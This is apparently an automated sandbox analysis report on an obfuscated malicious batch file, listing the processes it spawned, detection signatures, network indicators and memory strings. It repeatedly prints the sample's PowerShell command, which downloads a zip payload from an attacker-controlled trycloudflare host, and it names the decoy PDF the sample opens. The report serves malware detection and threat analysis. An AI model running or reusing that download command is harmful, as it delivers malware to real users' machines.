Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tuts.bat

Overview

General Information

Sample name:tuts.bat
Analysis ID:1546598
MD5:b89957d9c0b8644f65ee704c5a611f85
SHA1:685b1121fc5b34918610d3df23cdd8e93ddf1f71
SHA256:2e434d523df8fcbdc81fe75d6a08a0e8a8595abf71ae5170adba5854c3ba4213
Tags:batSpam-ITAtriangle-publications-tennessee-double-trycloudflare-comuser-Mangusta
Infos:

Detection

Abobus Obfuscator
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Yara detected Abobus Obfuscator
AI detected suspicious sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 6324 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 6372 cmdline: fiNd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • find.exe (PID: 6412 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 6468 cmdline: findstr /L /I set "C:\Users\user\Desktop\tuts.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6516 cmdline: findstr /L /I goto "C:\Users\user\Desktop\tuts.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6564 cmdline: findstr /L /I echo "C:\Users\user\Desktop\tuts.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6612 cmdline: findstr /L /I pause "C:\Users\user\Desktop\tuts.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6656 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6708 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • Acrobat.exe (PID: 6828 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2800 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6924 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2164 --field-trial-handle=1584,i,575126615186197544,683786838626507956,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 6872 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 6592 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
tuts.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6152, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 6592, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6152, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 6592, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6152, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 6592, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-01T08:23:27.215401+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449745TCP
    2024-11-01T08:24:06.073621+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449777TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: terrorists-cultures-wallpaper-tabs.trycloudflare.comVirustotal: Detection: 6%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
    Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089f\ source: powershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036086000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036093000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036086000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036093000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb*i source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb}\89A*i source: powershell.exe, 0000000F.00000002.1932073106.00000210360B4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb4 source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll) source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49745
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49777
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: terrorists-cultures-wallpaper-tabs.trycloudflare.com
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mr
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F7E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102DF70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F7E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102DF70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101F252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com
    Source: powershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/on
    Source: powershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip
    Source: powershell.exe, 0000000F.00000002.1888393855.000002101C049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zipT
    Source: powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip__author_
    Source: powershell.exe, 0000000F.00000002.1888393855.000002101C040000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1897081412.000002101C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1896909361.000002101C2A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1897081412.000002101C2B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip__author__=EscaLag__github__=gi
    Source: classification engineClassification label: mal64.evad.winBAT@40/56@2/0
    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-01 03-23-12-222.logJump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" "
    Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fiNd
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\tuts.bat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\tuts.bat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\tuts.bat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\tuts.bat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2164 --field-trial-handle=1584,i,575126615186197544,683786838626507956,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fiNdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2164 --field-trial-handle=1584,i,575126615186197544,683786838626507956,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
